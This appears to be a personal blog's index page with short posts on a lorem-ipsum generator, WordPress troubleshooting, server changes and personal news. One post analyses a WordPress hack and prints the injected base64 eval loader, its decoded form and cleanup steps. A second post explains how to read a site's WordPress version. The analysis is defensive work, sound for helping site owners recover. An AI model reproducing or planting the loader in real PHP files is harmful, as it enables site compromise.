Jason Cosper

Blog

  • Artisan 8-bit Photo Booth

    If you don’t already follow me on Twitter, you probably don’t know that I launched a new project last week. So take a minute and go check out Hipster Ipsum. You know, if you want to.

    I’ll admit that it’s kind of stupid — and making fun of hipsters is way played out by now — but this is one of those ideas that has been kicking around in my head for a while. And rather than just letting it flop around in my brainpan until someone else made it, I decided to carve out a little of my free time and actually ship it.

    I’m pretty happy with the results too. Here’s some of the text it’s generating:

    Jean shorts aliqua magna mollit. Whatever est leggings put a bird on it aesthetic sint tempor butcher. Keytar gluten-free fuck sustainable. Portland aesthetic chambray, Readymade nulla 8-bit bahn mi Austin keffiyeh Four Loko letterpress. Veniam skateboard deserunt vinyl nisi fugiat. Lo-fi accusamus sapiente, pariatur tofu aesthetic do leggings deserunt organic quis consequat.

    I’m sure that there’s plenty of hipster cliches that I’ve missed. So if you check out the site and see any that I might be missing, don’t hesitate to let me know!

  • This Comment Intentionally Left Blank

    So I’ve started running into some folks who have been getting comment moderation emails from their WordPress installs that look like this:

    From: WordPress <wordpress@example.com>
    Date: May 12, 2011 16:20
    Subject: [WordPress] Please moderate: “Hello World!”
    To: admin@example.com

    A new comment on the post “Hello World!” is waiting for your approval
    http://example.com/hello-world/

    Author : (IP: , )
    E-mail :
    URL :
    Whois : http://whois.arin.net/rest/ip/
    Comment:

    Approve it: http://example.com/wp-admin/comment.php?action=approve&c=0
    Trash it: http://example.com/wp-admin/comment.php?action=trash&c=0
    Spam it: http://example.com/wp-admin/comment.php?action=spam&c=0
    Currently 0 comments are waiting for approval. Please visit the moderation panel: http://example.com/wp-admin/edit-comments.php?comment_status=moderated

    Now I didn’t go and redact any information there — the emails are totally void of any comment data outside of the moderation links. That’s not right at all.

    So why does this happen? The answer is actually really simple. Almost embarrassingly so.

    To put it as plainly as possible, when comment moderation emails start showing up as blank, the wp_comments table has gone missing. If you look at some of your more popular posts or your comments panel, you’ll notice that everything is missing.

    It’s almost like your mom doesn’t even read your blog.

    Sometimes the table has completely disappeared, sometimes it’s just in need of a repair — but either way, you need to restore it to working order to make your comments happy again. And since hosts vary, I’m not going into the grizzly details of running that restore. I’m sure there’s plenty of nerds on the internet who’d be happy to help tho.

    Addendum: I’d like to hope that you’re backing up your install and database regularly. And if you’re not, maybe your hosting company is. Any worthwhile host will. But you should never ever depend on a single point of failure. I like to keep around 3 to 5, but I’m sort of paranoid.

    Remember, there’s never such a thing as too many backups!

    Good luck!

  • The Ol’ Switcheroo

    After a year of running this domain under nginx with XCache, I’ve decided to roll things back over to Apache for the time being.

    While nginx has been great when it came to system resources, I’ve never been able to get it to play nicely with Super Cache. I mean, things were caching just fine — but expired stuff hung around forever. And while I like my tweets, photos and Pinboard links from a few days ago, I’d rather show my visitors fresh content.

    Besides, I’ve seriously been itching to use mod_pagespeed and PHP 5.3 on my personal site. And since neither of those things are available under the DreamHost install of nginx, my hand was forced.

    But not all hope is lost! Being the huge nerd that I am, I’ll probably switch back to nginx once PHP-FPM support gets added into the DreamHost PHP 5.3 install.

  • Jobs in Carbonite

    Fucking. Epic.

    Oh, it’s also happens to be available as an iPhone case or skin.

    You know, if you’re into that sort of thing.

  • PS22 Chorus + Freelance Whales

    https://www.youtube.com/watch?v=sRa2HUEN4po
    I seriously love the version of “Generator ^ First Floor” that the PS22 Chorus did here. It’s pretty damn epic.

    Then again, it doesn’t hurt that the Freelance Whales are hanging out and backing them up. Great, great, great song.

  • Friendly WordPress Upgrade Reminders

    If you weren’t already aware, the gang at WordPress just shipped a pretty critical security update. In fact, it’s kind of a big deal. So much so that I went around and patched all my sites the second their update on the matter hit my phone.

    Since I’ve put a lot of energy into helping folks recover their hacked sites as of late, I figured I’d draw up a quick Twitter PSA for a few of my friends who make a living thru their WP sites:

    You *really* need to upgrade the copy of WordPress on your blog when you get a chance. Go to “Dashboard > Updates” in wp-admin to run one.

    After sending that out as a direct message a handful of times, I figured that some of the other nerds out there might appreciate having that too. So here it is — free to use it as you see fit!

    P.S. Should you not know how to check the version number on a friend’s WordPress site you can normally locate it using one of two methods:

    1. Use view source in your browser and then do a find for “generator”. That should show you the meta tag that WordPress inserts into the page for usage metrics and such.
    2. Add “readme.html” to the end of the blog URL. This doesn’t always work, but most folks leave the WordPress ReadMe file (which contains WP’s version number) in place.

  • WordPress, style.css.php and You

    I’ve been seeing this code crop up a lot in some of the recent WordPress hacks that I’ve had to diagnose:

    < ?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

    Most folks with this issue have a problem with “wp-login.php” returning a blank page for users trying to get into “wp-admin” — so if you’re seeing that, it may be a good sign that this is to blame.

    Running that bit of nastiness above thru a base64 decoder gets us this:

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Hrm. Let’s go ahead and have a look at “wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/”…

    -rw-r--r-- 2 user group 13789 2010-08-10 06:20 bi
    -rw-r--r-- 1 user group 212 2008-10-28 03:59 butt2.png
    -rw-r--r-- 1 user group 5859 2008-01-31 10:10 button_bg.png
    -rw-r--r-- 2 user group 880 2010-12-26 02:32 cnf
    -rw-r--r-- 2 user group 50 2010-12-24 03:38 csi
    -rw-r--r-- 1 user group 60 2008-01-31 10:10 down_arrow.gif
    -rw-r--r-- 1 user group 785 2008-01-31 10:10 fade-butt.png
    -rw-r--r-- 2 user group 1223 2010-07-29 20:55 ggl
    -rw-r--r-- 2 user group 68 2010-04-07 22:44 kwd
    -rw-r--r-- 2 user group 23813 2010-12-26 02:32 lb
    -rw-r--r-- 2 user group 0 2010-04-07 07:35 lock
    -rw-r--r-- 2 user group 225 2010-12-24 03:38 rlf
    -rw-r--r-- 2 user group 62159 2010-03-29 19:23 s.php
    -rw-r--r-- 1 user group 57 2008-01-31 10:10 separator.gif
    -rw-r--r-- 2 user group 89338 2010-03-30 02:09 skwd
    -rw-r--r-- 2 user group 254760 2010-12-23 03:06 style.css.php
    -rw-r--r-- 2 user group 402 2010-03-30 02:09 swf
    -rw-r--r-- 1 user group 1326 2008-02-21 13:40 tabs.gif

    Wait a minute. That directory in a fresh install looks like…

    -rw-r--r-- 1 user group 212 2010-12-08 12:59 butt2.png
    -rw-r--r-- 1 user group 5859 2010-12-08 12:59 button_bg.png
    -rw-r--r-- 1 user group 60 2010-12-08 12:59 down_arrow.gif
    -rw-r--r-- 1 user group 785 2010-12-08 12:59 fade-butt.png
    -rw-r--r-- 1 user group 57 2010-12-08 12:59 separator.gif
    -rw-r--r-- 1 user group 1326 2010-12-08 12:59 tabs.gif

    So “style.css.php” shouldn’t even exist at that location.  In fact, its existence is a solid indicator that your site has been flat out pwn3d.

    If you have access to a BSD or Linux shell and do a recursive grep for the first 10 characters piped to a line count at the root of your WordPress install, you’ll get a pretty solid idea of how many files the hackers have managed to infect.

    grep -R aWYoZnVuY3 * |wc -l

    Just to give you a baseline measurement, I’ve personally seen this code crop up in anywhere from 300 to 1100 files. It really tries its best to be impossible get rid of. Simply unpacking a fresh copy of WordPress over the top of the hacked site won’t work. This nasty piece of work gets into your themes, plugins and even your cached pages.

    So what do we do to fix it? I’m glad you asked.

    1. Make a backup copy of your current WordPress install. This means on your local computer or in a non-web accessible directory on your host.
    2. Remove the exec statement from the top of the infected “wp-config.php” file.
    3. Clear out your site’s directory. LEAVE. NOTHING. BEHIND.
    4. Install a fresh copy of WordPress into the now clean directory.
    5. Drop the tidied up copy of “wp-config.php” into the new install’s root directory.
    6. Restore your uploads directory (if you actually use it, that is).
    7. Install fresh copies of any WordPress themes and plugins you might need. DO NOT COPY OVER ANY PLUGINS OR THEMES FROM THE INFECTED INSTALL!
    8. Since the hacker had enough access to your site to insert their crap, assume that they now have your password info. Change the passwords for your MySQL and WordPress admin users as soon as you can. If you need help with that, the support staff at your host should be able to sort you out.

    Now you’re back to (mostly) normal. You may have to make some customizations to your theme here and there — but having to do that is way better than letting your site stay hacked.

    Oh, and just to be safe, consider installing Exploit Scanner in your copy of WordPress and running it against your database.  The last thing I’d want is for you to spend all that time cleaning up your site just to have it pwn3d a second time.

    Good luck!

    P.S. If you do manage to spot something in that scan, let me know! I haven’t had to do a clean-up on one of the installs that I maintain just yet, so any extra info y’all can hook me up with would be helpful for everyone out there affected by this.

    Update: I just got to do a cleanup of a friend’s site who was unfortunate enough to get hit. It looks like the database on their site isn’t hiding anything nasty. Still, it’s a wise idea to run Exploit Scanner just to make sure there aren’t any variants of the attack that do write to the database.

  • Lighten Up

    I understand putting a little milk in one’s coffee — but “lightener” just sounds nasty.

  • The 30 Steps To Mastery

    Dear Ben Casnocha,

    You totally fucking nailed it, dude.

    1. Start
    2. Keep going.
    3. You think you’re starting to get the hang of it.
    4. You see someone else’s work and feel undeniable misery.
    5. Keep going.
    6. Keep going.
    7. You feel like maybe, possibly, you kinda got it now.
    8. You don’t.
    9. Keep going.

    Read the remainder here.

  • Blog Days Are Over

    Earlier this morning I confirmed the domain transfers for something that I spent almost six years of my life on. A site that I both obsessed over and neglected terribly.

    As of 8 AM, Preshrunk is somebody else’s baby. Saying that is a real punch in the (emotional) dick, but at least I know it’s in good hands now.

    I’m not going to use this post to talk about why I sold the site. That’s already been covered in enough detail. All I really want to say is that I’m happy it went to a good home.

    Oh, I’m also happy that I can pay off a respectable chunk of our wedding loan — but that’s only because the interest rate is embarrassingly high.

    Hopefully I’ll have a little more time to post here now. Considering my track record tho, I wouldn’t hold my breath for that…